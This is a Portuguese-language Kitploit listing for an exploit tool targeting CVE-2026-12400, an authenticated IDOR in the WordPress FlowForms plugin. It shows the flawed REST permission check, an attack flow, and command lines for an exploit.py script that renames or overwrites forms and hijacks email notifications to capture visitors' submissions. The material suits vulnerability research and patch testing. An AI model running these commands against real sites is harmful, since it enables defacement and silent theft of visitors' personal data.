Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-12400-Exploit — # Exploração IDOR autenticada do WordPress para CVE-2026-12400; enumera IDs de formulários REST do FlowForms e modifica o conteúdo dos formulários ou sequestra notificações por e-mail. | Kitploit
Ferramentas/GitHubGitHub/0x00phantom-hat/cve-2026-12400-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsTestes de PenetraçãoAprendizado e Educação
GitHub0x00phantom-hat/cve-2026-12400-exploit

CVE-2026-12400-Exploit

# Exploração IDOR autenticada do WordPress para CVE-2026-12400; enumera IDs de formulários REST do FlowForms e modifica o conteúdo dos formulários ou sequestra notificações por e-mail.

Ver Repositório
112há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-12400 — FlowForms IDOR: Modificação Não Autorizada de Formulários

Referência Direta a Objeto Insegura Autenticada (Contribuidor+) para Modificação Arbitrária de Formulários no FlowForms ≤ 1.1.1

Visão Geral da Vulnerabilidade

PropriedadeValor
ID CVECVE-2026-12400
Pontuação CVSS4.3 — Médio
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CWECWE-639 (Contorno de Autorização Através de Chave Controlada pelo Usuário)
ProdutoFlowForms — Plugin WordPress de Construtor de Formulários Conversacionais
AfetadoTodas as versões até e incluindo 1.1.1
Corrigido emCorrigido na versão 1.1.2
PesquisadorPhantom Hat

Análise Técnica

Estudo de caso completo em caixa branca com análise de código-fonte, rastreamento de fluxo de entrada e comparação de patches:

📄 Caso de Estudo CVE-2026-12400 — Medium

Superfície de Ataque

O FlowForms expõe dois endpoints da API REST sob o namespace flowforms/v1 que são vulneráveis:

POST /index.php?rest_route=/flowforms/v1/forms/{id}
POST /index.php?rest_route=/flowforms/v1/forms/{id}/settings

Ambos aceitam um {id} controlado pelo usuário no caminho da URL e modificam os dados do formulário alvo — nome, conteúdo, layout, URL de redirecionamento e destinatários de notificação por e-mail.

Causa Raiz

Ambos os registros de rota vulneráveis compartilham o mesmo permission_callback falho:

// Atualizar conteúdo/nome do formulário
register_rest_route($ns, '/forms/(?P<id>\d+)', [
    'methods'             => WP_REST_Server::EDITABLE,
    'callback'            => [$this, 'update_form'],
    'permission_callback' => fn() => current_user_can('edit_posts'),
]);

// Atualizar configurações do formulário (notificações por e-mail, layout, etc.)
register_rest_route($ns, '/forms/(?P<id>\d+)/settings', [
    'methods'             => WP_REST_Server::EDITABLE,
    'callback'            => [$this, 'update_settings'],
    'permission_callback' => fn() => current_user_can('edit_posts'),
]);

edit_posts é uma capacidade detida por Contribuidores. O parâmetro {id} nunca é verificado contra a propriedade do usuário solicitante — qualquer usuário autenticado pode mirar em qualquer ID de formulário no site.

Fluxo de Ataque

Atacante (Contribuidor)              API REST FlowForms
        │                                   │
        │── POST /wp-login.php ────────────>│  (1) Autenticar como Contribuidor
        │<─ cookie wordpress_logged_in ─────│
        │                                   │
        │── GET /wp-admin/post-new.php ────>│  (2) Coletar nonce REST
        │<─ wpApiSettings.nonce ────────────│
        │                                   │
        │── GET /flowform/{id} ────────────>│  (3) Enumerar formulários publicados
        │<─ HTTP 200 ───────────────────────│      (qualquer formulário acessível é um alvo)
        │                                   │
        │── POST /flowforms/v1/forms/{id}   │  (4a) Sobrescrever nome/conteúdo do formulário
        │       com payload do atacante ───>│       ← sem verificação de proprietário
        │<─ { "success": true } ────────────│
        │                                   │
        │── POST /flowforms/v1/forms/{id}   │  (4b) Sequestrar notificações por e-mail
        │       /settings ─────────────────>│       ← atacante recebe todas
        │<─ { "success": true } ────────────│         as futuras submissões de formulários
        │                                   │
        │   Todos os 3 vetores confirmados  │  (5) Nome ✔  Conteúdo ✔  E-mail ✔

Três Vetores de Ataque

ModoEndpointImpacto
nome/forms/{id}Renomear qualquer formulário — desfiguração, engenharia social
conteúdo/forms/{id}Sobrescrever layout, telas de boas-vindas/agradecimento, URL de redirecionamento
e-mail/forms/{id}/settingsSequestrar e-mail de notificação — receber silenciosamente todas as submissões de formulários

O modo e-mail é o mais crítico. Após o sequestro, cada submissão ao formulário de contato da vítima — incluindo PII dos visitantes, mensagens e detalhes de contato — é encaminhada silenciosamente para o endereço controlado pelo atacante. O administrador do site não vê nenhuma indicação da alteração.


Uso do Exploit

Pré-requisitos

  • Python 3.8+
  • Uma conta autenticada com pelo menos o papel de Contribuidor no site alvo

Instalação

git clone https://github.com/0x00phantom-hat/CVE-2026-12400-Exploit.git
cd CVE-2026-12400-FlowForms-IDOR-Exploit
pip install -r requirements.txt

Modos de Operação

Modificação de Nome

Renomear qualquer formulário para conteúdo controlado pelo atacante:

python3 exploit.py \
  -u http://TARGET \
  --user contribuidor \
  --password senha123 \
  -i 1 -n 100 \
  --exploit name

Modificação de Conteúdo

Sobrescrever layout, telas, URL de redirecionamento e imagens de fundo:

python3 exploit.py \
  -u http://TARGET \
  --user contribuidor \
  --password senha123 \
  -i 1 -n 100 \
  --exploit content

Sequestro de Notificação por E-mail (Maior Impacto)

Redirecionar todas as notificações futuras de submissão de formulários para um endereço controlado pelo atacante:

python3 exploit.py \
  -u http://TARGET \
  --user contribuidor \
  --password senha123 \
  -i 1 -n 100 \
  --exploit email

Com Proxy (Burp Suite)

python3 exploit.py \
  -u http://TARGET \
  -p http://127.0.0.1:8080 \
  --user contribuidor \
  --password senha123 \
  -i 1 -n 100 \
  --exploit email

Referência Completa de Flags

FlagCurtaDescriçãoObrigatório
--url-uURL do WordPress alvo✅
--userNome de usuário do WordPress (Contribuidor+)✅
--passwordSenha do WordPress✅
--id-start-iID inicial de formulário para enumeração✅
--num-forms-nNúmero de IDs de formulário a enumerar✅
--exploitModo de ataque: name / content / email✅
--proxy-pURL do proxy (ex.: http://127.0.0.1:8080)❌

Personalizando Payloads

Baixar ferramenta